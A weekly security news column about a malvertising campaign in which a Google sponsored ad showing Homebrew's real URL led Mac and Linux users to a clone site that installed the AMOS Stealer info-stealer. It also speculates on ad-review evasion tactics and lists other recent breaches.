DMN Security Bite is proudly sponsored by Mosyle, the sole Apple Unified Platform. We specialize in making Apple devices work-ready and secure for enterprises. Our unique approach integrates cutting-edge Apple-specific security measures for fully automated Hardening & Compliance, Next Generation EDR, AI-driven Zero Trust, and exclusive Privilege Management, all with the most advanced Apple MDM available. As a result, over 45,000 organizations trust our entirely automated Apple Unified Platform to manage millions of Apple devices effortlessly and affordably. Seize your EXTENDED TRIAL today to discover why Mosyle is your ultimate partner for Apple solutions.
Recently, it was revealed that Google is once again directing users to a malicious site as a sponsored search result. This incident marks a continuation of a troubling trend where Google Ads has inadvertently endorsed websites containing malware; the first incident dates back to 2007, involving ads for deceptive antivirus software commonly referred to as “scareware.” How is it possible that in 2025, with resources like DeepMind, Google is still susceptible to such breaches? How are cybercriminals managing to outsmart them?
This week, I intend to provide a brief overview of this alarming campaign and the methods likely employed to execute it.
Security Bite is a weekly column on DMN, where I offer insights into data privacy, discuss the latest vulnerabilities, and highlight emerging threats in Apple’s extensive ecosystem of over 2 billion active devices.
Fraudulent Homebrew ads spreading malware to Mac users
Homebrew is a popular open-source package manager for macOS and Linux, enabling users to install, update, and manage software via command line.
Ryan Chenkie alerted users on X last Saturday that Google was promoting an ad for a malicious imitative of the widely-used developer tool that harbors malware targetting Mac and Linux users.
Typically, users can identify a fraudulent site by scrutinizing the URL. Cybercriminals often replace an “o” with a “0” or a lowercase “l” with a capital “I,” among other tricks. However, in this case, Chenkie discovered that the fake version showed Homebrew’s legitimate URL (“brew.sh”) in Google’s search results, providing no clear indicators that it was a fraudulent site. When clicked, victims were redirected to the malicious clone site (“brewe.sh”).
On the malicious site, users were instructed to install Homebrew by inputting a command in their terminal, mimicking the official installation procedure for the authentic Homebrew. Unbeknownst to them, executing this command triggers the download and execution of malware on their Mac or Linux devices.
The malware utilized in this incident, known as AMOS Stealer, or ‘Atomic,’ is a type of info-stealer specifically designed for macOS, available to cybercriminals as a subscription service costing $1,000 a month. Once a device is compromised, it employs scripts to extract as much user data as feasible, including iCloud Keychain passwords, credit card details, files, browser-stored crypto wallet keys, and more. AMOS then quietly transmits the stolen data back to the attackers using its cURL command.
Mike McQuaid, the project leader for Homebrew, shared a post on X acknowledging the situation, highlighting the project’s limited capacity to prevent further incidents. He noted that the clone site has been taken down but critiqued Google for its inadequate review procedures, stating, “There’s little we can do about this really; it keeps happening again and again, and Google seems to willingly accept money from scammers. Please help spread awareness so we can hope for a permanent solution from Google.”
For those who feel the same frustration as I do, it is perplexing how Google continues to allow these situations. This is especially concerning in light of last year’s incident where a fraudulent version of Google Authenticator, a well-established multi-factor authentication tool, was permitted as a sponsored result, endangering unsuspecting users.
Potential Techniques Employed
Similar to the App Store review process, Google Ads isn’t immune to malicious actors attempting to gain approval through underhanded methods. However, in contrast to the App Store, Google Ads heavily relies on automated systems for content review, which allows crafty hackers to exploit clever evasion tactics.
A common tactic involves registering domain names closely resembling legitimate URLs, as seen with “brewe.sh” in the recent Homebrew incident. From that point, they might initiate a “bait-and-switch” by initially submitting benign content for approval and subsequently changing it to redirect users to a malicious site once their ads are greenlit. Why do these tactics go undetected by Google? Cybercriminals often hijack Google Ads accounts that boast a clean history and sound reputation, allowing them greater leeway. This means that the legitimate URL remains visible in the search results until Google re-indexes.
While I can’t definitively assert that this was the method used in this case, past experiences suggest it’s a plausible scenario.
Fortunately, these types of attacks tend to be short-lived due to the reporting process associated with Google Ads. Nevertheless, even a brief exposure can lead to hundreds or thousands of infections, as Google Search is utilized by millions on a daily basis.
Always remember: trust, but verify. ✌️
Additional Updates in Apple Security
- A significant data breach involving Gravy Analytics has reportedly exposed precise location information for millions of users of popular apps like Candy Crush, Tinder, MyFitnessPal, and others. Here’s what you need to know about this unfolding breach.
- Washington State is initiating a lawsuit against T-Mobile stemming from a 2021 security incident that compromised the personal data of approximately 79 million individuals, including 2 million residents of Washington. Compromised data includes social security numbers, phone numbers, physical addresses, and driver’s license information, among others.
- A new report from Check Point Research reveals details about a recent variant of the notorious Banshee stealer malware from Russian-speaking cybercriminals, which draws inspiration from Apple’s own security practices to avoid detection.
- A vulnerability in Subaru’s security system permitted remote tracking, unlocking, and starting of millions of vehicles. A year’s worth of location history was accessible and accurate within five meters—alarming news that, while not directly related to Apple, is quite concerning.
Thank you for reading! Security Bite will return next Friday.
Follow Arin: LinkedIn, Threads,
BlueSky
FTC: We utilize income-earning automated affiliate links. More.
